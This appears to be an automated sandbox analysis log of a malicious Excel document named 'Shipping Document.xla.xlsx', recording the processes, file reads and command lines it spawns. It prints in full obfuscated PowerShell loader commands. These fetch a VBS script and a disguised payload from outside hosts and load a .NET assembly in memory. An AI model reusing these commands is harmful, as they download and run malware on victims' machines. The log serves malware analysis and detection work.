      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Shipping Document.xla.xlsxJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9B93.tmpJump to behavior
      Source: Shipping Document.xla.xlsxOLE indicator, Workbook stream: true
      Source: 02B30000.0.drOLE indicator, Workbook stream: true
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.q.......q.....0gf...............D.....0gf.....8gf...............D......3D.....................0gf.............Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(D.......................q.....}..w......q.......D.......D......1D.....(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1..............P................q.......q.....}..w..............D.......D......1D.....(.P.......D......3D.......1.............0C..............Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................k.l....}..w....0C......\.F.......D.............(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1.....................................0C......}..w.............$i.....Wh.l......h.....(.P.......................1.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................k.l....}..w....0C......\.F.......D.............(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1.....................................0C......}..w.............$i.....Wh.l......h.....(.P.......................1.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....h.......N.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..$i.....Wh.l......h.....(.P.....................h....... .......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.V.I.C.E.c.r.e.d.E.N.T.I.a.L.D.e.p.L.o.Y.M.E.n.T...E.X.e.................h.......@.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.................h.......@.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1.....................................0C......}..w.............$i.....Wh.l......h.....(.P.......................1.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...h.......N.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1.....................................0C......}..w.............$i.....Wh.l......h.....(.P.......................1.....l.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......0C......}..w.............$i.....Wh.l......h.....(.P.....................h...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...q.....}..w..............D.......D......1D.....(.P.......D......3D......................2..............Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(D.......................q.....}..w......q.......D.......D......1D.....(.P.............p.......................................Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Shipping Document.xla.xlsxReversingLabs: Detection: 21%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES59C4.tmp" "c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES59C4.tmp" "c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"Jump to behavior
